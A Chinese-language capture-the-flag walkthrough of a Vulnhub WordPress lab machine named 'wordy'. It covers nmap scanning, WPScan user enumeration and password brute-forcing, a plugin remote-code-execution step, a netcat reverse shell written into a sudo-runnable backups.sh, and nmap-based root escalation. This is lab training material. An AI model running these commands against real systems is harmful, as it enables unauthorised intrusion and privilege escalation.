Vulnhub提示：

扫描靶机IP地址:nmap -sP 192.168.10.0/24

扫描端口信息：nmap -sV -p 1-65535 -A 192.168.10.129

开放端口22，80

访问80端口发现URL被重定向到wordy

我们需要在host文件中添加

文件位置 /etc/hosts

可以访问到啦

扫描下目录结构吧，

御剑扫描

发现是wordpress站点

使用WPscan扫描

一款专注于wordpress站点扫描工具

wpscan -url wordy

顺便枚举一下用户

站点没发现什么漏洞，暴力破解尝试下

root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt

破解很久没获取密码，这时候想起Vulnhub重要提示

root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

使用这个字典在尝试下暴力破解

root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt

获得密码

mark
helpdesk01

登录后台发现Activity on Wordy插件存在远程代码执行漏洞

利用远程代码执行命令漏洞步骤：

step1：打开burpsuite工具设置代理

step2：

step3：发送到重写模块

step4：kali打开端口监听

step5：利用成功获取到webshell

横向移动搜寻可以利用的信息

成功找到了graham的密码信息

查看graham用户的sudo -l 权限，可以以jens 用户权限执行backups.sh脚本

如果以jens身份执行反弹shell脚本，反弹回的则是jens用户的shell

echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh

kali 端监听 8888 端口

sudo -u jens 以jens用户执行脚本，不加-u 则默认以root权限执行，那样当然是不能成功的

jens用户可以以 root权限执行 nmap nmap 提权分为两种

旧版本上以进入交互提权

# 进入nmap的交互模式
nmap --interactive
# 执行sh，提权成功
!sh

新版本

echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF